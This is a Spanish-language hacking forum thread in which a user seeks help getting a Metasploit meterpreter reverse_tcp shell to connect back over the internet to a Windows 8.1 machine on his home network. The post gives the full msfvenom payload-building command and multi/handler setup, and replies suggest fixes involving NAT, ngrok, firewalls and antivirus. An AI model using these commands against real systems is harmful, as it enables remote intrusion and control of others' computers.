Antes de nada este es mi primer post, nunca e publicado ninguno antes, espero explicarme adecuadamente.Tengo un problema/duda estoy intentando lanzar un ataque fuera de mi red local a un windows 8.1 que esta conectado a un router que tengo en mi casa ( en mi casa tengo 2 routers ) pero cuando ejecuto todos los comandos y ejecuto a su vez el archivo . exe en el windows 8.1 no se me inica meterpreter> aqui os dejo con los comandos que utilizo y el payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=ip pública LPORT=4444-o /root/Escritorio/PruebaFueraLan.exe
Anteriormente ya e abierto el puerto
nueva terminal y ejecuto metasploit
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST mi ip
LHOST => 0.0.0.0
msf exploit(multi/handler) > exploit
- Started reverse TCP handler on mi ip :4444
ejecuto el exe ya enviado al windows 8.1 pero no se me inicia el meterpreter
Si alguien me puede ayudar se lo agradeceria mucho :) :) :)
Hola Goaking, en principio si ya has hecho nat en tu router para redirigir las peticiones entrantes, es decir que has abierto el puerto 4444 a la máquina atacante x.y.z.v, ya tendrías un paso realizado, después también en el parámetro de escucha LHOST me imagino como describes habrás puesto la ip de tú máquina atacante, si la configuración de metasploit la tienes configurada correctamente, creo que la clave la tendrás en el nat de tu router o en en la máquina donde estés ejecutando mestasploit, ya que puede ser que el firewall no tenga permitido aceptar esas peticiones(esto es menos probable, pero posible).
Hola amigo antes de nada gracias por ayudarme, ya configure el nat pero sigue igual, lo probé con ngrok y funciona perfectamente, si sabes de algún otro método o alguna solución me ayudarlas bastante,gracias
Hola @Goaking (https://underc0de.org/foro/index.php?action=profile;u=86623)
Super facil liberar el puerto del router.
Saludos.
Antes de nada gracias por aportar @puntoCL (https://underc0de.org/foro/index.php?action=profile;u=10350)
A que te refieres con liberar los puertos?
Si te refieres a abrirlos si ya están abiertos los puertos y aún sigo sin poder
y que ip pusiste en el router? y te fijaste que ese puerto esta libre? por que puedes a ver un servicio que esta corriendo en ese puerto
@puntoCL (https://underc0de.org/foro/index.php?action=profile;u=10350) puse la ip privada que ya puse en su día en estática y el puerto esta libre e llegado a pensar que fuera por la compañía que tengo contratada pero lo intenté en otra red WiFi y sigue pasando lo mismo, me cuesta decirlo pero creo que me voy a rendir porque ya no se porque puede ser de todas formas muchas gracias de todas formas dejaré el post abierto
puede ser que la maquina victima no ejecute el paylodad. el AV puede borrar o por ultima instancia ve el corta fuego
@puntoCL (https://underc0de.org/foro/index.php?action=profile;u=10350) Amigo gracias por tu ayuda pero creo que es mejor que deje este tema apartado.No quiero comerme mas la cabeza porque llevo mucho tiempo investigando y no encuentro la solución, lo que hare sera centrarme en otra cosa y aprender otros ataques o otras cosas como SQL injection que tengo ganas de aprender mas sobre el tema.
La verdad no me esperaba que me ayudarais porque como nunca puse ningun post no tenia mucha confianza pero ya se que este es un buen foro :) , lo bueno de todo esto esque he aprendido mucho mas sobre el tema gracias a ustedes de verdad gracias por la ayuda, si consigo algún dia conseguir hacer el ataque fuera de lan intentare ayudar a personas con el mismo problema
GRACIAS!!! ;)